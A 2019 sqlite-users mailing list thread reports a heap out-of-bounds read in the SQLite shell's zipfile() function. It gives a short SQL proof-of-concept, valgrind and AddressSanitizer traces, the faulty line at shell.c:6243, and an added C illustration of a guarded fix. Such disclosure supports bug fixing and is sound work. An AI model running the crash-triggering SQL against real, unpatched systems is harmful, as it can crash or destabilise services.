Re: [sqlite] Heap Out of Bound Read in Sqlite

2019-12-24 Thread Dominique Pellé
Yongheng Chen  wrote:

> This seems to be a problem of gcc (Ubuntu 5.5.0-12ubuntu5~16.04). When
> I use this specific version to compile sqlite, the problem can be reproduced.

Unlikely to be a compiler issue.
I can reproduce the bug with valgrind with
SQLite shell built with:

* gcc (Ubuntu 7.4.0-1ubuntu1~18.04.1) 7.4.0
* or clang-6.0.0-1ubuntu2

Dominique
___
sqlite-users mailing list
sqlite-users@mailinglists.sqlite.org
http://mailinglists.sqlite.org/cgi-bin/mailman/listinfo/sqlite-users


Re: [sqlite] Heap Out of Bound Read in Sqlite

2019-12-24 Thread Dominique Pellé
On Tue, Dec 24, 2019 at 5:48 PM Richard Hipp  wrote:
>
> On 12/24/19, Yongheng Chen  wrote:
> >
> > When we run it with sqlite compiled with asan, we got a heap overflow crash.
> >
> > The bug exists in the latest development code.
>
> Unable to repro.  Tried tip of trunk and release, using gcc and clang,
> all with various combinations of -fsanitize=memory,
> -fsanitize=address, -fsanitize=undefined, and running under valgrind.

Hi

I just tried the latest from trunk in fossil
(1c0a05b09 2019-12-24 16:20:05 UTC) and I can
reproduce the bug when running with valgrind:

$ valgrind ./sqlite3
==6674== Memcheck, a memory error detector
==6674== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==6674== Using Valgrind-3.13.0 and LibVEX; rerun with -h for copyright info
==6674== Command: ./sqlite3
==6674==
SQLite version 3.31.0 2019-12-24 16:20:05
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 )
VALUES ( 10.1 ) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO
NOTHING ; END ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE
'1' ) FROM v0 ;
==6674== Invalid read of size 1
==6674==at 0x12944E: zipfileStep (shell.c:6243)
==6674==by 0x1B8711: sqlite3VdbeExec (sqlite3.c:91052)
==6674==by 0x1BD58F: sqlite3Step (sqlite3.c:82703)
==6674==by 0x1BD58F: sqlite3_step (sqlite3.c:82768)
==6674==by 0x13161D: exec_prepared_stmt (shell.c:11379)
==6674==by 0x13161D: shell_exec (shell.c:11684)
==6674==by 0x132C7B: runOneSqlLine (shell.c:18265)
==6674==by 0x13CCE4: process_input (shell.c:18365)
==6674==by 0x11DD65: main (shell.c:19123)
==6674==  Address 0x5d15ccf is 1 bytes before a block of size 120,000 alloc'd
==6674==at 0x4C2FB0F: malloc (in /usr/lib/valgrind/vgpreload_memcheck-amd64-linux.so)
==6674==by 0x16AAF0: sqlite3MemMalloc (sqlite3.c:23180)
==6674==by 0x1459E1: mallocWithAlarm (sqlite3.c:27071)
==6674==by 0x1459E1: sqlite3Malloc (sqlite3.c:27101)
==6674==by 0x1516A4: setupLookaside (sqlite3.c:158620)
==6674==by 0x1E463D: openDatabase (sqlite3.c:161240)
==6674==by 0x1327FF: open_db.part.64 (shell.c:12696)
==6674==by 0x132EA6: open_db (stdio2.h:97)
==6674==by 0x132EA6: runOneSqlLine (shell.c:18261)
==6674==by 0x13CCE4: process_input (shell.c:18365)
==6674==by 0x11DD65: main (shell.c:19123)
==6674==
0|NULL
sqlite>

Line where overflow is detected in shell.c:6243:

 6242   }else{
!6243 if( zName[nName-1]!='/' ){
 6244   zName = zFree = sqlite3_mprintf("%s/", zName);

Regards
Dominique
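As an added illustration (not code from this thread or from SQLite itself), here is the shape of the check quoted at shell.c:6243 beside a guarded form: when nName is 0, as for the '' name the PoC passes to zipfile(), zName[nName-1] indexes one byte before the buffer, which is exactly the "1 bytes before a block" read in the valgrind report. The function names and the policy of rejecting an empty directory name are assumptions of this example.

```c
#include <stdlib.h>
#include <string.h>

/* Shape of the unguarded check (reconstructed for illustration, not
 * SQLite's code): zName[nName-1] is read without ruling out nName==0,
 * so an empty name reads the byte just before the allocation.
 * Kept only for comparison; nothing in this file calls it. */
int needs_slash_unchecked(const char *zName, int nName){
  return zName[nName-1]!='/';
}

/* Guarded form: the length is checked before any indexing. An empty
 * name has no last byte to test, so it never needs a slash appended. */
int needs_slash(const char *zName, int nName){
  if( nName<=0 ) return 0;
  return zName[nName-1]!='/';
}

/* Build a directory name that always ends in '/', mirroring the
 * mprintf("%s/", zName) step on the quoted line. Returns a malloc'd
 * string the caller frees, or NULL when zName is empty (rejected as an
 * invalid directory name; an assumption of this example) or on
 * allocation failure. */
char *zip_dir_name(const char *zName){
  int nName = (int)strlen(zName);
  char *zOut;
  if( nName==0 ) return NULL;
  zOut = malloc((size_t)nName + 2);   /* room for '/' and the terminator */
  if( zOut==0 ) return NULL;
  memcpy(zOut, zName, (size_t)nName);
  if( needs_slash(zName, nName) ){
    zOut[nName++] = '/';
  }
  zOut[nName] = 0;
  return zOut;
}
```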


Re: [sqlite] Heap Out of Bound Read in Sqlite

2019-12-24 Thread Yongheng Chen
This seems to be a problem of gcc (Ubuntu 5.5.0-12ubuntu5~16.04). When I use this
specific version to compile sqlite, the problem can be reproduced.

Just in case you need it, here’s the log I got:
—
SQLite version 3.31.0 2019-12-24 15:35:53
Enter ".help" for usage hints.
Connected to a transient in-memory database.
Use ".open FILENAME" to reopen on a persistent database.
sqlite> CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
sqlite> CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
sqlite> CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 
) ,( '' ) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> INSERT INTO v0 VALUES ( 10 , 10 ) ;
sqlite> SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) 
FROM v0 ;
=
==25839==ERROR: AddressSanitizer: heap-buffer-overflow on address 
0x634007ff at pc 0x0042c622 bp 0x7ffe62feaf20 sp 0x7ffe62feaf10
READ of size 1 at 0x634007ff thread T0
#0 0x42c621 in zipfileStep /data/xxx/sqlite/asan/shell.c:6243
#1 0x5a30f6 in sqlite3VdbeExec /data/xxx/sqlite/asan/sqlite3.c:91052
#2 0x5c155e in sqlite3Step /data/xxx/sqlite/asan/sqlite3.c:82703
#3 0x5c155e in sqlite3_step /data/xxx/sqlite/asan/sqlite3.c:82768
#4 0x436e0d in exec_prepared_stmt /data/xxx/sqlite/asan/shell.c:11379
#5 0x43da53 in shell_exec /data/xxx/sqlite/asan/shell.c:11684
#6 0x440631 in runOneSqlLine /data/xxx/sqlite/asan/shell.c:18265
#7 0x450f95 in process_input /data/xxx/sqlite/asan/shell.c:18365
#8 0x412a65 in main /data/xxx/sqlite/asan/shell.c:19123
#9 0x7fc3b2a9d82f in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x2082f)
#10 0x413e18 in _start (/data/xxx/sqlite/asan/sqlite3+0x413e18)

0x634007ff is located 1 bytes to the left of 12-byte region 
[0x63400800,0x6341dcc0)
allocated by thread T0 here:
#0 0x7fc3b3754662 in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.2+0x98662)
#1 0x4d2ea0 in sqlite3MemMalloc /data/xxx/sqlite/asan/sqlite3.c:23180
—

Yongheng Chen

> On Dec 24, 2019, at 11:48 AM, Richard Hipp  wrote:
> 
> On 12/24/19, Yongheng Chen  wrote:
>> 
>> When we run it with sqlite compiled with asan, we got a heap overflow crash.
>> 
>> The bug exists in the latest development code.
> 
> Unable to repro.  Tried tip of trunk and release, using gcc and clang,
> all with various combinations of -fsanitize=memory,
> -fsanitize=address, -fsanitize=undefined, and running under valgrind.
> 
> 
> -- 
> D. Richard Hipp
> d...@sqlite.org



Re: [sqlite] Heap Out of Bound Read in Sqlite

2019-12-24 Thread Richard Hipp
On 12/24/19, Yongheng Chen  wrote:
>
> When we run it with sqlite compiled with asan, we got a heap overflow crash.
>
> The bug exists in the latest development code.

Unable to repro.  Tried tip of trunk and release, using gcc and clang,
all with various combinations of -fsanitize=memory,
-fsanitize=address, -fsanitize=undefined, and running under valgrind.


-- 
D. Richard Hipp
d...@sqlite.org


[sqlite] Heap Out of Bound Read in Sqlite

2019-12-24 Thread Yongheng Chen
Hi,

We found an OOB read in sqlite. Here's the PoC:
—
CREATE TABLE v0 ( v2 NOT NULL PRIMARY KEY , v1 ) ;
CREATE TEMP TRIGGER y AFTER INSERT ON v0 BEGIN DELETE FROM v0 ; END ;
CREATE TRIGGER x DELETE ON v0 BEGIN INSERT INTO v0 ( v2 ) VALUES ( 10.1 ) ,( '' 
) ,('') ,( 1) ,( 1) ,( 1) ,( 1 ) ON CONFLICT DO NOTHING ; END ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
INSERT INTO v0 VALUES ( 10 , 10 ) ;
SELECT v2 + zipfile ( v2 , v1 + v2 ) == '1' , quote ( v1 LIKE '1' ) FROM v0 ;
—

When we run it with sqlite compiled with asan, we got a heap overflow crash.

The bug exists in the latest development code.

Yongheng & Rui